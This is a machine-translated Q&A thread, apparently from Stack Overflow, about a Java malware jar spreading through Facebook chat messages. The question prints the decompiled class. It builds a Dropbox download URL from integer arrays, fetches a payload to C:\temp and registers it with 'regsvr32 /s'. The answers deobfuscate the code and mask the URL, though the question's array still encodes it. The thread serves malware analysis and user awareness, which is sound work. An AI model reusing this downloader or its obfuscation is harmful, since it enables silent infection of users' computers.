我在facebook上引用了两次这个消息" lol abc.rar" ,abc.rar文件有一个可执行的jar文件,一旦点击就试图连接到Facebook并随机输入相同的消息给另一个聊天。我使用jd gui 0.36对它进行了反编译,并在此恶意软件/病毒中发现了一个类czjffdqozxffyhrq,其中还有一个清单文件。我尝试了病毒总数,但没有给出任何结果。这肯定是一个威胁,因为它来自我的两个facebook朋友,他们彼此无关,所以它传播得非常快 病毒总结果: https://www.virustotal.com/en/file/a5ce78b2b3e3d6a98982ec300ff05abc8b56a5ed27b9b67b2e2fc417fc56a9df/analysis/1397065080/
现在的类代码:-package com.cakes;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
public class czjffdqozxffyhrq
{
public static String mrdbdgwortilmglt()
{
int[] tdclrmdqriktvlkvmy = { 104, 116, 116, 112, 58, 47, 47, 100, 108, 46, 100, 114, 111, 112, 98, 111, 120, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 115, 47, 110, 108, 100, 113, 99, 116, 110, 98, 118, 108, 101, 122, 52, 50, 98, 47, 109, 111, 100, 117, 108, 101, 46, 100, 97, 116, 63, 100, 108, 61, 49 };
StringBuilder cfmbxqxdanzahnu = new StringBuilder(tdclrmdqriktvlkvmy.length);
for (int i = 0; i < tdclrmdqriktvlkvmy.length; i++) {
cfmbxqxdanzahnu.append((char)tdclrmdqriktvlkvmy[i]);
}
return cfmbxqxdanzahnu.toString();
}
public static String olzezeaokmr()
{
int[] wwlytwss = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };
StringBuilder uurwhymtb = new StringBuilder(wwlytwss.length);
for (int i = 0; i < wwlytwss.length; i++) {
uurwhymtb.append((char)wwlytwss[i]);
}
return uurwhymtb.toString();
}
public static String wxujpwlzjfvvc()
{
int[] krihniioygdowfq = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92 };
StringBuilder dmpxcpok = new StringBuilder(krihniioygdowfq.length);
for (int i = 0; i < krihniioygdowfq.length; i++) {
dmpxcpok.append((char)krihniioygdowfq[i]);
}
return dmpxcpok.toString();
}
public static String uwqeeyesndtlyfye()
{
int[] wwlytwsspath = { 114, 101, 103, 115, 118, 114, 51, 50, 32, 47, 115, 32, 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };
StringBuilder eiljiba = new StringBuilder(wwlytwsspath.length);
for (int i = 0; i < wwlytwsspath.length; i++) {
eiljiba.append((char)wwlytwsspath[i]);
}
return eiljiba.toString();
}
public static void bnyikewbdrqhetgb()
throws IOException
{
int m = 1;
while (m < 7)
{
Runtime.getRuntime().exec(uwqeeyesndtlyfye());
m++;
}
}
public static void main(String[] args)
throws Exception
{
new File(wxujpwlzjfvvc()).mkdir();
File u = new File(olzezeaokmr());
if (u.exists())
{
bnyikewbdrqhetgb();
}
else
{
String pdisodea = mrdbdgwortilmglt();
String lwpztudm = olzezeaokmr();
lslmzhpvu(pdisodea, lwpztudm);
}
}
public static void lslmzhpvu(String rklnt, String nenyy)
throws IOException
{
URL hsnmxltpgt = new URL(rklnt);
InputStream mlzfltpyqeoqdahzvel = hsnmxltpgt.openStream();
OutputStream uxvkcl = new FileOutputStream(nenyy);
byte[] b = new byte[432101];
int length;
while ((length = mlzfltpyqeoqdahzvel.read(b)) != -1)
{
int length;
uxvkcl.write(b, 0, length);
}
mlzfltpyqeoqdahzvel.close();
uxvkcl.close();
bnyikewbdrqhetgb();
}
}
有人可以解释这是如何工作的,为什么它仍然无法检测到?
答案 0 :(得分:3)
这是一个非常微不足道的混淆尝试。
方法:
mrdbdgwortilmglt olzezeaokmr wxujpwlzjfvvc uwqeeyesndtlyfye 只是String隐藏为整数数组。
bnyikewbdrqhetgb显然很顽皮,因为它正在调用Runtime.getRuntime().exec ...这应该始终是代码中的警告标志。
lslmzhpvu正在访问网址...也很顽皮。
顽皮&#34;,在这里,我的意思是它的代码到达自己之外,因此可能会在其他地方造成伤害。在您下载的代码中,这应该是一个重要的警示标志,除非您知道代码应该使用URL或执行外部程序。
它正在抓住它。它会检测未经授权的访问URL的尝试并发出警告。
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
public class czjffdqozxffyhrq
{
public static String getDropBoxURL() {
// This URL has been bowdlerized to protect the dangerously curious
return "http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/****.dat?dl=1";
}
public static String getTempFile() {
return "C:\\temp\\qvsfccjm.gtj";
}
public static String getTempDir() {
return "C:\\temp\\";
}
public static String getRegisterCommand() {
return "regsvr32 /s C:\\temp\\qvsfccjm.gtj";
}
public static void registerControlSixTimes() throws IOException {
int m = 1;
while (m < 7)
{
Runtime.getRuntime().exec(getRegisterCommand());
m++;
}
}
public static void main(String[] args) throws Exception {
new File(getTempDir()).mkdir();
File u = new File(getTempFile());
if (u.exists())
{
registerControlSixTimes();
}
else
{
String dbURL = getDropBoxURL();
String tempFileName = getTempFile();
downloadFromURLToFile(dbURL, tempFileName);
}
}
public static void downloadFromURLToFile(String urlString, String fileName) throws IOException {
URL url = new URL(urlString);
InputStream in = url.openStream();
OutputStream out = new FileOutputStream(fileName);
byte[] b = new byte[432101];
int length;
while ((length = in.read(b)) != -1) {
int length;
out.write(b, 0, length);
}
in.close();
out.close();
registerControlSixTimes();
}
}
答案 1 :(得分:3)
基本上它从;
下载文件http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/******.dat?dl=1
(混淆链接,不要错误地下载任何人)
...到c:\ temp并使用;
在系统中注册它regsvr32 /s <filename>
真正的邪恶可能在下载的文件中(我不打算下载:))